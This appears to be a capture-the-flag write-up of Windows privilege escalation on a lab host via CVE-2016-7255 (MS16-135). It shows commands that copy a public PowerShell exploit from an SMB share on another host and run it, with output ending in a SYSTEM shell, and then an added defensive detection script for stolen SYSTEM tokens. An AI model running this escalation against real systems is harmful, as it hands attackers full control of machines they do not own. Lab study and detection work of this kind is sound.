Sherlock found out that the target system is vulnerable to CVE-2016-7255 which was later patched with MS16-135

CVE-2016-7255 (MS16-135)


A vulnerability classified as critical has been found in Microsoft Windows (operating system). It affects an unknown part of the library win32k.sys. Manipulation with an unknown input leads to an access control vulnerability. CWE classifies the issue as CWE-264. It impacts confidentiality, integrity, and availability.

The weakness was released on 11/08/2016 by Neel Mehta with Trend Micro as MS16-135, a confirmed bulletin (TechNet). The advisory can be read at technet.microsoft.com. This vulnerability has been uniquely identified as CVE-2016-7255 since 09/09/2016. Exploitability is reported to be easy. Attacking locally is a requirement, and authentication is necessary for exploitation. Technical details and a public exploit are known. The attack technique used by this issue is T1068 according to MITRE ATT&CK.

Exploit


I found a PowerShell implementation of the exploit

Privilege Escalation


PS C:\tmp> copy \\10.10.14.6\smb\MS16-135.ps1
PS C:\tmp> .\MS16-135.ps1
	 _____ _____ ___   ___     ___   ___ ___ 
	|     |   __|_  | |  _|___|_  | |_  |  _|
	| | | |__   |_| |_| . |___|_| |_|_  |_  |
	|_|_|_|_____|_____|___|   |_____|___|___|
										
	                   [by b33f -> @FuzzySec]
					   
[?] Target is Win 8.1
[+] Bitmap dimensions: 0x760*0x4
 
[?] Adjacent large session pool feng shui..
[+] Worker  : FFFFF90144234000
[+] Manager : FFFFF90144236000
[+] Distance: 0x2000
 
[?] Creating Window objects
[+] Corrupting child window spmenu
[+] Trying to trigger arbitrary 'Or'..
[+] Trying to trigger arbitrary 'Or'..
 
[?] Success, reading beyond worker bitmap size!
[+] Old manager bitmap pvScan0: FFFFF90144236260
[+] New manager bitmap pvScan0: FFFFF90144234050
 
[>] Leaking SYSTEM _EPROCESS..
[+] _EPROCESS list entry: 0xFFFFF80009F64028
[+] SYSTEM _EPROCESS address: 0xFFFFE001F4EAE900
[+] PID: 4
[+] SYSTEM Token: 0xFFFFC000170079BB
 
[>] Leaking current _EPROCESS..
[+] Traversing ActiveProcessLinks list
[+] PowerShell _EPROCESS address: 0xFFFFE001F835C080
[+] PID: 2808
[+] PowerShell Token: 0xFFFFC00019B929FA
 
[!] Duplicating SYSTEM token!
 
PS C:\tmp> whoami
nt authority\system
PS C:\tmp> hostname
optimum
PS C:\tmp> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
 
Tunnel adapter isatap.{99C463C2-DC10-45A6-9CC8-E62F160519AE}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
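The end state of the session above is a user-launched powershell.exe (PID 2808) that now carries the SYSTEM token copied from PID 4, which is also the net effect the CVE description calls an access control vulnerability in win32k.sys. The following PowerShell is an added defender-side check written for this page; it is not part of the original writeup or of the MS16-135.ps1 exploit. It flags processes owned by NT AUTHORITY\SYSTEM whose parent process is owned by a non-SYSTEM account, which is the shape a stolen or duplicated SYSTEM token leaves behind. Legitimate elevation paths (services, scheduled tasks, UAC prompts) are normally spawned by SYSTEM-owned parents, so hits are worth a look; the $AllowList parameter and the PID-reuse handling are assumptions about how an operator would tune it, not anything the page states.

```powershell
# Added example (not the writeup's own code): heuristic for a user-owned parent
# whose child process runs as NT AUTHORITY\SYSTEM, as seen after the token
# duplication in the exploit output. Uses only built-in CIM cmdlets.

function Get-ProcessOwnerMap {
    # Build a PID -> "DOMAIN\User" table once so parent lookups are cheap.
    $map = @{}
    foreach ($p in Get-CimInstance -ClassName Win32_Process) {
        $owner = Invoke-CimMethod -InputObject $p -MethodName GetOwner
        if ($owner.ReturnValue -eq 0) {
            $map[[int]$p.ProcessId] = "$($owner.Domain)\$($owner.User)"
        } else {
            # Access denied or the process exited between the two calls.
            $map[[int]$p.ProcessId] = '<unknown>'
        }
    }
    return $map
}

function Find-SuspiciousSystemProcess {
    [CmdletBinding()]
    param(
        # Process names that are normal on this host even with a non-SYSTEM parent.
        # Assumption: operators fill this in from a baseline; it starts empty.
        [string[]] $AllowList = @()
    )
    $owners = Get-ProcessOwnerMap
    foreach ($p in Get-CimInstance -ClassName Win32_Process) {
        $childId  = [int]$p.ProcessId
        $parentId = [int]$p.ParentProcessId
        $owner    = $owners[$childId]

        if ($owner -ne 'NT AUTHORITY\SYSTEM')  { continue }
        if ($AllowList -contains $p.Name)      { continue }
        # Parent already gone (or its PID reused by a newer process): skip rather
        # than report against the wrong owner.
        if (-not $owners.ContainsKey($parentId)) { continue }
        $parentProc = Get-CimInstance -ClassName Win32_Process -Filter "ProcessId = $parentId"
        if ($null -eq $parentProc -or $parentProc.CreationDate -gt $p.CreationDate) { continue }

        $parentOwner = $owners[$parentId]
        if ($parentOwner -eq 'NT AUTHORITY\SYSTEM' -or $parentOwner -eq '<unknown>') { continue }

        # A SYSTEM child of a non-SYSTEM parent: the pattern left by token theft.
        [PSCustomObject]@{
            ProcessId   = $childId
            Name        = $p.Name
            Owner       = $owner
            ParentId    = $parentId
            ParentOwner = $parentOwner
            CommandLine = $p.CommandLine
        }
    }
}

# Run from an elevated console so GetOwner succeeds for SYSTEM processes.
Find-SuspiciousSystemProcess | Format-Table -AutoSize
```

Run it elevated; from an unprivileged console GetOwner fails on SYSTEM processes and every owner comes back as `<unknown>`, so nothing is reported. The check is a point-in-time snapshot, so it complements rather than replaces event-based telemetry such as process-creation logging with parent and user fields.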

System Level Compromise